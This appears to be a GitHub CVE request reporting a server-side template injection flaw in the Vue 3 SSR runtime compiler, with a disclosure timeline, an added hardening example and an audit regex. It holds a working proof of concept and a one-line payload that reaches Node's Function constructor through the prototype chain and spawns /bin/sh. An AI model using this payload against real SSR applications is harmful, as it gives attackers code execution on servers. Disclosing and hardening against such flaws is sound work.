CVE Request: Remote Code Execution in Vue.js 3.x SSR Runtime Compiler (GHSA-pw74-q32p-x99f) #7299
Description
CVE Request — Vendor Unresponsive
I am requesting GitHub CNA to assign a CVE ID for a critical vulnerability in Vue.js that the vendor has not responded to after 10 days.
Existing Advisory
- GHSA: GHSA-pw74-q32p-x99f (submitted 2026-03-29, still in triage)
- MITRE: Ticket #2014701 (submitted 2026-03-25) + CVE Form Ticket #2019581 (submitted 2026-04-03)
- Vendor: security@vuejs.org — notified 2026-03-25, final notice 2026-03-31, zero response
Vulnerability Summary
| Field | Value |
|---|---|
| Product | Vue.js (vuejs/core) — @vue/server-renderer, @vue/compiler-ssr, @vue/compiler-core |
| Versions | All Vue 3.x through 3.5.30 (latest) |
| CWE | CWE-94 (Improper Control of Generation of Code) |
| CVSS | 10.0 Critical (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) |
| Type | Server-Side Template Injection → Remote Code Execution |
Root Cause
Vue 3's SSR runtime template compiler (ssrCompile.ts) executes compiled templates via Function('require', code)(require) without sandboxing. The prefixIdentifiers transform rewrites Identifier AST nodes but not ThisExpression nodes, allowing this.__proto__.constructor.constructor(...)() to achieve arbitrary code execution in Node.js.
Proof of Concept
```js
import { createSSRApp } from 'vue'
import { renderToString } from 'vue/server-renderer'

const userInput = "{{ this.__proto__.constructor.constructor('return process.version')() }}"
const app = createSSRApp({ template: `<div>${userInput}</div>` })
const html = await renderToString(app)
console.log(html) // <div>v22.22.1</div> — full RCE confirmed
```

Full RCE chain: `this.__proto__.constructor.constructor("var s=process.binding('spawn_sync');var r=s.spawn({file:'/bin/sh',args:['sh','-c','id'],...});return Buffer.from(r.output[1]).toString()")()`
Prior Art
- CVE-2019-19919 (Handlebars.js): Identical exploit vector — prototype chain traversal to Function constructor in a template engine. Was assigned CVE.
- CVE-2018-6341 (Vue 2 SSR): Related Vue 2 XSS vulnerability in SSR, was assigned CVE.
Impact
Any Vue 3 SSR application that compiles templates at runtime with user-controlled content is vulnerable to Remote Code Execution. This includes CMS platforms, low-code builders, and multi-tenant SaaS applications.
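The affected pattern is a template string assembled from request data and handed to the runtime compiler. The following is an added example, not code from this issue or from vuejs/core, showing the hardened shape an SSR application can use instead: template source stays static and registered at build time, and user content travels only as component data, where `{{ }}` interpolation treats it as a string rather than as an expression to compile. It also includes a small regex-based audit helper for finding `template:` options built from template literals or concatenation. The template names, their contents, the `ALLOWED_FIELDS` map, and the sample source lines are constructed for the example; `vue` is deliberately not imported so the module runs on its own, and the usage with `createSSRApp`/`renderToString` is shown in a comment.

```javascript
// Added example (not from the issue or from vuejs/core): a hardening pattern
// for Vue 3 SSR applications that render user-supplied content.
//
// Unsafe pattern (the one in the PoC): user text spliced into the template
// source, so the SSR runtime compiler turns that text into code.
// Safe pattern: static templates authored at build time; user text is passed
// only as component data and rendered through {{ }} interpolation.
//
// Assumed wiring into Vue (not executed here, so `vue` is not imported):
//   import { createSSRApp } from 'vue'
//   import { renderToString } from 'vue/server-renderer'
//   const html = await renderToString(
//     createSSRApp(buildSsrComponent('comment', { body: userInput })))

// Static templates, authored by developers, never built from request data.
// Constructed for this example.
const TEMPLATES = Object.freeze({
  comment: '<div class="comment">{{ body }}</div>',
  profile: '<section><h1>{{ name }}</h1><p>{{ bio }}</p></section>',
});

// Each template declares the data fields it reads, so a caller cannot
// smuggle arbitrary keys into render state. Constructed for this example.
const ALLOWED_FIELDS = Object.freeze({
  comment: ['body'],
  profile: ['name', 'bio'],
});

// Build component options from a registered static template plus user data.
// Throws if the template is not registered; drops fields the template does
// not declare; coerces values to strings so only text reaches the renderer.
function buildSsrComponent(templateName, userFields) {
  if (!Object.prototype.hasOwnProperty.call(TEMPLATES, templateName)) {
    throw new Error(
      `unknown template "${templateName}"; templates must be registered at build time`);
  }
  const data = {};
  for (const key of ALLOWED_FIELDS[templateName]) {
    const value = userFields[key];
    data[key] = value === undefined || value === null ? '' : String(value);
  }
  return {
    template: TEMPLATES[templateName], // static: identical for every request
    data: () => ({ ...data }),         // user content lives here only
  };
}

// Audit helper: flag source lines whose `template:` option is a template
// literal containing ${...} or a string built by concatenation. Heuristic,
// regex-based; meant for a quick sweep over a code base, not as a parser.
const DYNAMIC_TEMPLATE_RE =
  /template\s*:\s*(`[^`]*\$\{|['"][^'"]*['"]\s*\+|\w+\s*\+\s*['"`])/;

function findDynamicTemplates(sourceLines) {
  const hits = [];
  sourceLines.forEach((line, i) => {
    if (DYNAMIC_TEMPLATE_RE.test(line)) {
      hits.push({ line: i + 1, text: line.trim() });
    }
  });
  return hits;
}

// Constructed sample source lines for the audit helper.
const SAMPLE_SOURCE = [
  "const app = createSSRApp({ template: `<div>${userInput}</div>` })",                    // dynamic
  "const app2 = createSSRApp({ template: '<div>' + body + '</div>' })",                    // dynamic
  "const app3 = createSSRApp({ template: '<div>{{ body }}</div>', data: () => ({ body }) })", // static
  "const app4 = createSSRApp(buildSsrComponent('comment', { body }))",                     // static
];
```

With this arrangement the string a user submits never reaches `Function(...)` as compiler input; it is only ever a data value that the static template interpolates. The audit regex is intentionally narrow and will miss templates assembled across several statements, so treat its output as a starting point for review rather than a complete inventory.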
Disclosure Timeline
| Date | Action |
|---|---|
| 2026-03-25 | Reported to security@vuejs.org |
| 2026-03-25 | MITRE ticket #2014701 submitted |
| 2026-03-29 | GitHub PVR GHSA-pw74-q32p-x99f submitted |
| 2026-03-31 | Final notice sent to security@vuejs.org |
| 2026-04-03 | MITRE CVE Form submitted (Ticket #2019581) |
| 2026-04-04 | This GitHub CNA request |
| 2026-06-23 | 90-day public disclosure deadline |
Request
Please assign a CVE ID for this vulnerability. The vendor (Vue.js / Evan You) has been completely unresponsive for 10 days across multiple channels (direct email, GitHub PVR, MITRE).